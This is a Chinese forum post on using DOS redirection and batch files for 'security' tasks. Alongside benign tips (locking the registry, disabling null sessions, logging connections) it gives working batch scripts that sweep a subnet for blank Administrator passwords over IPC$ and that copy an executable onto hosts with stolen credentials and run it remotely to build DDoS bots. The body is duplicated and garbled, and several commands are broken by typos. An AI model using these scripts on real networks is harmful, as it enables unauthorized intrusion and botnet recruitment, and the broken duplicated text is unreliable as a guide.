重定向命令在安全方面的应用实例
2014/4/29 10:09:00 人气 1329 计算机网络论坛 1.给注册表加锁/解锁
大家知道,注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\Policies\System分支下的DWORD值“Disableregistrytools”的键值如为“1”,则可以给注册表加锁,这样别人就无法使用注册表编辑器。利用重定向命令在DOS下就可以给注册表加锁/解锁,非常方便。
打开记事本程序,新建一个文本文件,输入如下内容:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo “DisableRegistryTools“=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件注册表就会被锁定!
在上面的命令中,echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,如果想看到程序执行过程,请将“@”去掉。大家在编写上述代码时要注意的是,第一行中的“REGEDIT4”一定要用大写字母,在第二行中“echo”和“.”之间没有空格。“>>”产生的内容将追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以无需确认就删除123.reg文件。
要想给注册表解锁,可以编辑这个批处理文件,只需将“DisableRegistryTools“=dword:00000001改为“DisableRegistryTools“=dword:00000000,其他内容不变,保存为.bat文件,点击就可以给注册表解锁了。
2.把登陆3389的机器IP记录下来
把下面的内容保存为3389IP.bat:
time /t >>log.log
netstat -n -p tcp |find “:3389“>>Log.log
start Explorer
运行3389IP.bat,然后查看log.log文件即可看到登陆3389的机器IP,是不是很方便呢?
3.恢复DOS实模式
大家知道,某些恶意网页会修改浏览者的注册表,在无所不用其极的各种手段中,修改注册表使DOS实模式不可用是其中的招数之一。要想恢复DOS实模式方法有很多,用批处理和重定向命令结合使用,是比较特别的一招,在此与大家分享。
echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo “NoRealMode“=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以恢复DOS实模式,那些DOS应用程序又可以使用了。
4.等待肉鸡上门
每天费时费力的找肉鸡是不是很辛苦,利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件,输入如下内容:
@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start
保存为.bat文件(事先得准备好一个nc.exe文件,它是网络故障事件检测软件Netcat的主程序),然后运行此程序之后,你就等着肉鸡上门主动来找你吧!运气好的话,每天10个不成问题。
5.快速进行空连接
空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use \\IP\ipc$$ ““ /user:““ 就可以简单地和目标建立一个空连接(需要目标开放IPC$$)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接,并把结果保存到一个文件中供你分析。方法是用记事本编辑如下内容的文件:
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc$$ ““ /use:“Administrator“ | find “命令完成“ >>test.txt
批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$$连接,如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中,for命令的功能是对一组文件中的每一个文件执行某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO * [*-parameters],具体的含义:
%variable:指定一个单一字母可替换的参数。
(set):指定一个或一组文件。可以使用通配符。
*:指定对每个文件执行的命令。
*-parameters:为特定命令指定参数或命令行开关。
在批处理文件中使用FOR命令时,指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的,所以%i不同%I。
6.禁止空连接
空连接的存在对有一定的危险,所以我们还是禁止它为好!方法是输入net share察看本地共享资源,接下来输入如下命令删除共享:
net share ipc$$ /*
net share admin$$ /*
net share c$$ /*
net share d$$ /*(如果有e,f等盘符可以同法删除)
然后用记事本新建一个文本文件,输入如下内容即可:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
@echo “RestrictAnonymous“=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以禁止空连接。
7.扫描所有和本机以TCP协议连接的计算机
扫描自己的计算机端口,发现有特殊端口打开,可以查木马,不仅如此,利用下面这个批处理文件还可以把所有和本机以TCP协议连接的计算机IP地址都记录下来。这个.bat文件内容如下:
data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log
这样不仅可以记录下对方的IP,还有时间和日期,方便自己查看。
8.自动获取DDoS肉鸡
DDoS是Distributed Denial of Service的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。
虽然不建议大家使用DDoS方式攻击,但作为技术掌握还是很有必要的。可是,如何才能获取进行DDoS攻击的肉鸡呢?把下面的内容保存为ok.bat文件就可以达到目的了:
@echo off
echo自动获取DDoS肉鸡
for /f “tokens=1,3*“ %i in (host.txt) do net use \\%k\ipc$$ /user:“%j“
copy %1 \\%i\admin$$\sysytem32
if errorelevel 0 goto success
ps* -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$$ /del
:success
echo ------------------------------>>success.txt
echo 肉鸡:%i>>success.txt
echo 用户名:%j>>success.txt
echo 密码:%k>>success.txt
echo ------------------------------>>success.txt
使用方法是ok.bat *.exe host.txt,其中host.txt的格式为:ip administrator password。好了
大家知道,注册表HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVerssion\Policies\System分支下的DWORD值“Disableregistrytools”的键值如为“1”,则可以给注册表加锁,这样别人就无法使用注册表编辑器。利用重定向命令在DOS下就可以给注册表加锁/解锁,非常方便。
打开记事本程序,新建一个文本文件,输入如下内容:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]>>123.reg
@echo “DisableRegistryTools“=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件注册表就会被锁定!
在上面的命令中,echo是DOS下的回显命令,在它的前面加上“@”前缀字符,表示执行时本行在命令行或DOS里面不显示,如果想看到程序执行过程,请将“@”去掉。大家在编写上述代码时要注意的是,第一行中的“REGEDIT4”一定要用大写字母,在第二行中“echo”和“.”之间没有空格。“>>”产生的内容将追加到它后面的文件中。在文件的最后一行加上deltree /y 123.reg,就可以无需确认就删除123.reg文件。
要想给注册表解锁,可以编辑这个批处理文件,只需将“DisableRegistryTools“=dword:00000001改为“DisableRegistryTools“=dword:00000000,其他内容不变,保存为.bat文件,点击就可以给注册表解锁了。
2.把登陆3389的机器IP记录下来
把下面的内容保存为3389IP.bat:
time /t >>log.log
netstat -n -p tcp |find “:3389“>>Log.log
start Explorer
运行3389IP.bat,然后查看log.log文件即可看到登陆3389的机器IP,是不是很方便呢?
3.恢复DOS实模式
大家知道,某些恶意网页会修改浏览者的注册表,在无所不用其极的各种手段中,修改注册表使DOS实模式不可用是其中的招数之一。要想恢复DOS实模式方法有很多,用批处理和重定向命令结合使用,是比较特别的一招,在此与大家分享。
echo off
echo REGEDIT4>c:\scanreg.reg
@echo.>>lock.reg
echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]>>c:\scanreg.reg
echo “NoRealMode“=dword:00000000>>c:\scanreg.reg
regedit /s c:\scanreg.reg
@del c:\scanreg.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以恢复DOS实模式,那些DOS应用程序又可以使用了。
4.等待肉鸡上门
每天费时费力的找肉鸡是不是很辛苦,利用重定向命令和批处理文件就可以让你简单的找到肉鸡!方法是用记事本新建一个文本文件,输入如下内容:
@echo off
:start
nc -vv -w 5 -l -p 80>>rouji.log
goto start
保存为.bat文件(事先得准备好一个nc.exe文件,它是网络故障事件检测软件Netcat的主程序),然后运行此程序之后,你就等着肉鸡上门主动来找你吧!运气好的话,每天10个不成问题。
5.快速进行空连接
空连接是在没有信任的情况下与服务器建立的会话,换句话说,它是一个到服务器的匿名访问。使用命令net use \\IP\ipc$$ ““ /user:““ 就可以简单地和目标建立一个空连接(需要目标开放IPC$$)。利用重定向命令和for命令就可以对一个C类网段进行快速的空连接,并把结果保存到一个文件中供你分析。方法是用记事本编辑如下内容的文件:
@echo off
echo 格式:test *.*.*>test.txt
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%Gipc$$ ““ /use:“Administrator“ | find “命令完成“ >>test.txt
批处理文件保存为.bat,运行即可。这个批处理文件的功能是对你指定的一个C类网段中的254个ip依次试建立帐号为administrator口令为空的ipc$$连接,如果成功就把结果记录在test.txt。这样就实现了NT弱口令扫描功能!其中,for命令的功能是对一组文件中的每一个文件执行某个特定命令,也就是可以用你指定的循环范围生成一系列命令。For命令的格式为:FOR %variable IN (set) DO * [*-parameters],具体的含义:
%variable:指定一个单一字母可替换的参数。
(set):指定一个或一组文件。可以使用通配符。
*:指定对每个文件执行的命令。
*-parameters:为特定命令指定参数或命令行开关。
在批处理文件中使用FOR命令时,指定变量请使用%%variable而不要用%variable。变量名称是区分大小写的,所以%i不同%I。
6.禁止空连接
空连接的存在对有一定的危险,所以我们还是禁止它为好!方法是输入net share察看本地共享资源,接下来输入如下命令删除共享:
net share ipc$$ /*
net share admin$$ /*
net share c$$ /*
net share d$$ /*(如果有e,f等盘符可以同法删除)
然后用记事本新建一个文本文件,输入如下内容即可:
@echo REGEDIT4>>123.reg
@echo.>>123.reg
@echo [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA]>>123.reg
@echo “RestrictAnonymous“=dword:00000001>>123.reg
@REGEDIT /S /C 123.reg
@deltree /y 123.reg
另存为以.bat为扩展名的批处理文件,点击这个文件就可以禁止空连接。
7.扫描所有和本机以TCP协议连接的计算机
扫描自己的计算机端口,发现有特殊端口打开,可以查木马,不仅如此,利用下面这个批处理文件还可以把所有和本机以TCP协议连接的计算机IP地址都记录下来。这个.bat文件内容如下:
data /t>>123.log
time /t>>123.log
netstat -n -p tcp 10>>123.log
这样不仅可以记录下对方的IP,还有时间和日期,方便自己查看。
8.自动获取DDoS肉鸡
DDoS是Distributed Denial of Service的缩写,意即分布式拒绝服务攻击。它是指借助于客户/服务器技术,将多个计算机联合起来作为攻击平台,对一个或多个目标发动DoS攻击,从而成倍地提高拒绝服务攻击的威力。通常,攻击者使用一个偷窃帐号将DDoS主控程序安装在一个计算机上,在一个设定的时间主控程序将与大量代理程序通讯,代理程序已经被安装在Internet上的许多计算机上。代理程序收到指令时就发动攻击。利用客户/服务器技术,主控程序能在几秒钟内激活成百上千次代理程序的运行。
虽然不建议大家使用DDoS方式攻击,但作为技术掌握还是很有必要的。可是,如何才能获取进行DDoS攻击的肉鸡呢?把下面的内容保存为ok.bat文件就可以达到目的了:
@echo off
echo自动获取DDoS肉鸡
for /f “tokens=1,3*“ %i in (host.txt) do net use \\%k\ipc$$ /user:“%j“
copy %1 \\%i\admin$$\sysytem32
if errorelevel 0 goto success
ps* -d \\%i c:\winnt\system32\%1
net user \\%i\ipc$$ /del
:success
echo ------------------------------>>success.txt
echo 肉鸡:%i>>success.txt
echo 用户名:%j>>success.txt
echo 密码:%k>>success.txt
echo ------------------------------>>success.txt
使用方法是ok.bat *.exe host.txt,其中host.txt的格式为:ip administrator password。好了
道可道,非常道。名可名,非常名。
暂无回复!
发表回复